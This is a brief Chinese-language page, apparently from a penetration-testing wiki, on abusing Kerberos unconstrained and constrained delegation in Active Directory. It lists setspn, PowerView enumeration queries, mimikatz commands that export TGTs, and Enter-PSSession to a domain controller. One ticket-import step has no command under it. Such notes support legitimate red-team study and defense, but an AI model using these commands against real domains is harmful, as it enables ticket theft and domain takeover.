账户委派
账户非受限委派
设置用户y为服务账户(服务账户有委派权限)
>setspn -U -A variant/golden y

查询非受限委派域内账号,使用powerview
>Get-NetUser -Unconstrained -Domain zone.com

利用
管理员权限打开mimikatz导出TGT
>privilege::debug
>sekurlsa::tickets /export

清空票据,导入票据


获得Powershell会话
> Enter-PSSession -ComputerName dc.zone.com

账户受限委派
查询受限委派用户
> Get-DomainUser -TrustedToAuth –Domain zone.com

查询受限委派主机
> Get-DomainComputer -TrustedToAuth -Domain zone.com

利用方法后见权限维持模块
最后更新于
这有帮助吗?